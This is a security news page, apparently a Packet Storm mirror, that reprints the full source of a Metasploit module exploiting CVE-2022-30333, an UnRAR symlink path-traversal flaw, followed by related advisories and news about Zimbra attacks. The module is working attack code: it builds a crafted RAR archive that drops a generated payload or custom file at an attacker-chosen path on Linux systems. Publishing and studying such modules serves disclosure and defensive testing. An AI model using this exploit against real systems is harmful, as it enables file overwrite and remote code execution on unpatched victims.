Security
Headlines
HeadlinesLatestCVEs

Headline

UnRAR Path Traversal

This Metasploit module creates a RAR file that exploits CVE-2022-30333, which is a path-traversal vulnerability in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. UnRAR fixed this vulnerability in version 6.12 (open source version 6.1.7). The core issue is that when a symbolic link is unRARed, Windows symbolic links are not properly validated on Linux systems and can therefore write a symbolic link that points anywhere on the filesystem. If a second file in the archive has the same name, it will be written to the symbolic link path.

Packet Storm
#vulnerability#mac#windows#linux#git#perl#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  include Msf::Exploit::Format::RarSymlinkPathTraversal  def initialize(info = {})    super(      update_info(        info,        'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',        'Description' => %q{          This module creates a RAR file that exploits CVE-2022-30333, which is a          path-traversal vulnerability in unRAR that can extract an arbitrary file          to an arbitrary location on a Linux system. UnRAR fixed this          vulnerability in version 6.12 (open source version 6.1.7).          The core issue is that when a symbolic link is unRAR'ed, Windows          symbolic links are not properly validated on Linux systems and can          therefore write a symbolic link that points anywhere on the filesystem.          If a second file in the archive has the same name, it will be written          to the symbolic link path.        },        'Author' => [          'Simon Scannell', # Discovery / initial disclosure (via Sonar)          'Ron Bowes', # Analysis, PoC, and module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-30333'],          ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],          ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],          ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],        ],        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Generic RAR file', {} ]        ],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-06-28',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [],          'SideEffects' => []        }      )    )    register_options(      [        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),        OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../" - as well as a filename).']),        OptString.new('SYMLINK_FILENAME', [ true, 'The name of the symlink file to use (must be 12 characters or less; default: random)', Rex::Text.rand_text_alpha_lower(4..12)])      ]    )  end  def exploit    print_status("Target filename: #{datastore['TARGET_PATH']}")    if datastore['CUSTOM_PAYLOAD'].present?      print_status("Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}")      payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])      # Append a newline + NUL byte, since random data will be appended and we      # don't want to break shellscripts      payload_data.concat("\n\0")    else      print_status('Encoding configured payload')      payload_data = generate_payload_exe    end    begin      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'], datastore['TARGET_PATH'], payload_data)    rescue StandardError => e      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")    end    file_create(rar)  endend

Related news

Ubuntu Security Notice USN-6569-1

Ubuntu Security Notice 6569-1 - it was discovered that libclamunrar incorrectly handled directories when extracting RAR archives. A remote attacker could possibly use this issue to overwrite arbitrary files and execute arbitrary code. This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04. It was discovered that libclamunrar incorrectly validated certain structures when extracting RAR archives. A remote attacker could possibly use this issue to execute arbitrary code.

Unpatched Zimbra Platforms Are Probably Compromised, CISA Says

Attackers are targeting Zimbra systems in the public and private sectors, looking to exploit multiple vulnerabilities, CISA says.

High-Severity Flaws in Juniper Junos OS Affect Enterprise Networking Devices

Multiple high-severity security flaws have been disclosed as affecting Juniper Networks devices, some of which could be exploited to achieve code execution. Chief among them is a remote pre-authenticated PHP archive file deserialization vulnerability (CVE-2022-22241, CVSS score: 8.1) in the J-Web component of Junos OS, according to Octagon Networks researcher Paulos Yibelo. "This vulnerability

Hackers Exploiting Unpatched RCE Flaw in Zimbra Collaboration Suite

A severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue. The shortcoming, assigned CVE-2022-41352, carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected

15-Year-Old Unpatched Python Vulnerability Potentially Affects Over 350,000 Projects

As many as 350,000 open source projects are believed to be potentially vulnerable to exploitation as a result of a security flaw in a Python module that has remained unpatched for 15 years. The open source repositories span a number of industry verticals, such as software development, artificial intelligence/machine learning, web development, media, security, IT management. The shortcoming,

Zimbra UnRAR Path Traversal

This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below provided that UnRAR versions 6.11 or below are installed.

UnRAR path traversal flaw can lead to RCE in Zimbra

Other applications using binary to extract untrusted archives are potentially vulnerable too

New UnRAR Vulnerability Could Let Attackers Hack Zimbra Webmail Servers

A new security vulnerability has been disclosed in RARlab's UnRAR utility that, if successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary. The flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.

CVE-2022-30333

RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.

Packet Storm: Latest News

Zeek 6.0.9